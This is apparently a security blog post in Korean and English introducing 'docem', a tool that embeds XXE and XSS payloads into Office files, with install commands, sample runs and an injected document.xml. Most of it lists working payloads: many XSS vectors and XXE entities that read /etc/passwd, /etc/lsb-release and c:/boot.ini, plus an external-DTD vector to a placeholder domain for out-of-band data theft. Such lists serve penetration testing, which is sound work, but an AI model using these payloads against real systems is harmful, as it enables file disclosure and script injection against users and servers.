If you find powerful OXML XXE tool? it's "DOCEM"
XXE 테스트 시 쓸만한 도구 하나 찾아서 공유드립니다. 직접 노가다하거나 기존에 공개됬던 툴보단 훨씬 편리할 것 같습니다.
When I tested OXML XXE, OOXML XXE, I used to create payload myself or used this tool.
Recently, i found powerful tool, I’d like to share a this tool, docem.
If you would like to know how to insert payload you self, please refer to the this link. There’s a similar tool on burp extension. https://www.hahwul.com/2017/12/web-hacking-ooxml-xxe-with-burp.html
How to install?
Just simple.
oneline command
git clone https://github.com/whitel1st/docem;cd docem;pip3 install -r requirements.txt;alias add docem="python3 $(pwd)/docem.py"
1) clone docem repo
git clone https://github.com/whitel1st/docem
cd docem
2) Install required packages
pip3 install -r requirements.txt
3) Run docem
python3 docem.py
usage: docem.py [-h] [-s SAMPLE] [-pm {xss,xxe}] [-kt]
[-pt {per_place,per_file,per_document}] [-sx SAMPLE_EXTENSION]
[-pf PAYLOAD_FILE]
Create docx,odt,pptx,etc files with XXE/XSS payloads
required arguments:
-s SAMPLE path to sample file
-pm {xss,xxe} payload mode: embedding XXE or XSS in a file
optional arguments:
-h, --help show this help message and exit
-kt do not delete unpacked and modified folders
-pt {per_place,per_file,per_document}
how many payloads will be in one file. per_document is
default
-sx SAMPLE_EXTENSION d
-pf PAYLOAD_FILE path to a file with payloads to embed
tip) Alias command
alias add docem="python3 $(pwd)/docem.py"
Inject XXE Payload to Office(word,excel etc…) file
It’s easy to create payloads through the docem.
query
docem -s samples/xxe/sample_oxml_xxe.docx -pm xxe -pf payloads/xxe_special_2.txt -kt -pt per_document -sx docx
output
Current magic_symbol: XXCb8bBA9XX
=========== Current setup ===========
sample file: samples/xxe/sample_oxml_xxe.docx
sample is it dir: False
payload mode: xxe
payload file: payloads/xxe_special_2.txt
payload type: per_document
number of payloads: 3
keep upacked files: True
======== Count magic symbols ========
0 symbols in docProps_app
0 symbols in docProps_core
0 symbols in _rels_
....snip....
payload_0
packed to: tmp/sample_oxml_xxe-per_document-payload_0_1569687338738463.docx
payload_1
packed to: tmp/sample_oxml_xxe-per_document-payload_1_1569687338751476.docx
payload_2
packed to: tmp/sample_oxml_xxe-per_document-payload_2_156968733876288.docx
Extract Payload file…
unzip sample_oxml_xxe-per_document-payload_2_156968733876288.docx
Archive: sample_oxml_xxe-per_document-payload_2_156968733876288.docx
creating: _rels/
creating: docProps/
creating: word/
inflating: [Content_Types].xml
inflating: docProps/app.xml
inflating: docProps/core.xml
inflating: _rels/.rels
creating: word/_rels/
creating: word/theme/
inflating: word/fontTable.xml
inflating: word/document.xml
inflating: word/settings.xml
inflating: word/webSettings.xml
inflating: word/styles.xml
inflating: word/stylesWithEffects.xml
inflating: word/theme/theme1.xml
inflating: word/_rels/document.xml.rels
You find Injected Payload
cat document.xml
<?xml version="1.0" encoding="UTF-8" standalone="no"?><!DOCTYPE roottag PUBLIC "-//OXML/XXE/EN" "http://127.0.0.1/a.dtd//etc/passwd">
All Payloads..
Empty
1) payload/no_payload.txt
no_payload%
XXS
2) payload/xss_all.txt
xss_test
'"><svg onload=alert(1)>
'"><svg onload=alert(2)>
'"><svg onload=alert(3)>
'"><svg onload=alert(4)>
<!--'"><-->svg onload=alert(5)<!-->-->
<!--'"><-->svg onload=alert(6)>
<!--'"><svg onload=alert(7)>-->
<![CDATA["'><]]>svg onload=alert(8)>
<![CDATA["'><]]>svg onload=alert(9)<![CDATA[>]]>
'"><svg onload=alert(10)>
'"><svg onload=alert(11)>
'"><svg onload=alert(12)>
'"><svg onload=alert(13)>
'"><svg onload=alert(14)>
'"><svg onload=alert(15)>
'"><svg onload=alert(16)>
'"><svg onload=alert(17)>
%27%22%3E%3Csvg onload=alert(18)%3E
%27%22>%3Csvg%20onload%3Dalert(19)>
%27%22>%3Csvg onload=alert(20)>
%27%22%3E%3Csvg%20onload%3Dalert(21)%3E
%27%22%3E%3Csvg%20onload%3Dalert(22)>
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert(23);<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
<![CDATA[<IMG SRC=x on]]><![CDATA[load=alert(24);">]]>
javascript:alert(25)
java%0ascript:alert(26)
java%09script:alert(27)
java%0dscript:alert(28)
java%0a%0dscript:alert(29)
java%0d%0ascript:alert(30)
\j\av\a\s\cr\i\pt\:\a\l\ert\(31\)
javascript://%0Aalert(32)
javascript://anything%0D%0A%0D%0Awindow.alert(33)
javascript:alert(34);
javascript:alert(35);
%26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341
3) payload/xss_tiny.txt
'"><svg onload=alert(1)>
'"><svg onload=alert(14)>
%27%22%3E%3Csvg%20onload%3Dalert(21)%3E
XXE
4) payload/xxe_special_1.txt
{"vector":"<!DOCTYPE docem [<!ENTITY xxe_canary \"XXE_STRING\">]>","reference":"&xxe_canary;"}
5) payload/xxe_special_2.txt
{"vector":"<!DOCTYPE docem [<!ENTITY xxe_test \"XXE_STRING\">]>","reference":""}
{"vector":"<!DOCTYPE docem [<!ENTITY xxe_canary_0 \"XXE_STRING\">]>","reference":"&xxe_canary_0;"}
{"vector":"<!DOCTYPE docem [<!ELEMENT docem ANY ><!ENTITY xxe_canary_2 SYSTEM \"file:///etc/lsb-release\">]>","reference":"&xxe_canary_2;"}
6) payload/xxe_special_3.txt
{"vector":"<!DOCTYPE docem [<!ENTITY xxe_test \"XXE_STRING\">]>","reference":""}
{"vector":"<!DOCTYPE docem [<!ENTITY xxe_canary_0 \"XXE_STRING\">]>","reference":"&xxe_canary_0;"}
{"vector":"<!DOCTYPE docem [<!ELEMENT docem ANY ><!ENTITY xxe_canary_2 SYSTEM \"file:///etc/lsb-release\">]>","reference":"&xxe_canary_2;"}
{"vector":"<!DOCTYPE docem [<!ELEMENT docem ANY ><!ENTITY xxe_canary_3 SYSTEM \"file:///etc/passwd\">]>","reference":"&xxe_canary_3;"}
{"vector":"<!DOCTYPE docem [<!ELEMENT docem ANY ><!ENTITY xxe_canary_4 SYSTEM \"file:///c:/boot.ini\">]>","reference":"&xxe_canary_4;"}
7) payload/xxe_special_4.txt
{"vector":"<!DOCTYPE docem [<!ENTITY xxe_test \"XXE_STRING\">]>","reference":""}
{"vector":"<!DOCTYPE docem [<!ENTITY xxe_canary_0 \"XXE_STRING\">]>","reference":"&xxe_canary_0;"}
{"vector":"<!DOCTYPE docem [<!ELEMENT docem ANY ><!ENTITY xxe_canary_2 SYSTEM \"file:///etc/lsb-release\">]>","reference":"&xxe_canary_2;"}
{"vector":"<!DOCTYPE docem [<!ELEMENT docem ANY ><!ENTITY xxe_canary_3 SYSTEM \"file:///etc/passwd\">]>","reference":"&xxe_canary_3;"}
{"vector":"<!DOCTYPE docem [<!ELEMENT docem ANY ><!ENTITY xxe_canary_4 SYSTEM \"file:///c:/boot.ini\">]>","reference":"&xxe_canary_4;"}
{"vector":"<!DOCTYPE docem [<!ELEMENT docem ANY ><!ENTITY xxe_canary_5 SYSTEM \"file:///etc/issue\">]>","reference":"&xxe_canary_5;"}
{"vector":"<!DOCTYPE docem [<!ELEMENT docem ANY ><!ENTITY % xxe_canary_6 SYSTEM \"file:///etc/issue\"><!ENTITY % dtd SYSTEM \"custom_domain\">%dtd;%trick;]> ]>","reference":""}
8) payload/xxe_special_5.txt
{"vector":"<!DOCTYPE docem [<!ENTITY xxe_test \"XXE_STRING\">]>","reference":""}
{"vector":"<!DOCTYPE docem [<!ENTITY xxe_canary_0 \"XXE_STRING\">]>","reference":"&xxe_canary_0;"}
{"vector":"<!DOCTYPE docem [<!ELEMENT docem ANY ><!ENTITY xxe_canary_2 SYSTEM \"file:///etc/lsb-release\">]>","reference":"&xxe_canary_2;"}
{"vector":"<!DOCTYPE docem [<!ELEMENT docem ANY ><!ENTITY xxe_canary_3 SYSTEM \"file:///etc/passwd\">]>","reference":"&xxe_canary_3;"}
{"vector":"<!DOCTYPE docem [<!ELEMENT docem ANY ><!ENTITY xxe_canary_4 SYSTEM \"file:///c:/boot.ini\">]>","reference":"&xxe_canary_4;"}
{"vector":"<!DOCTYPE docem [<!ELEMENT docem ANY ><!ENTITY xxe_canary_4 SYSTEM \"custom_domain_here\">]>","reference":"&xxe_canary_4;"}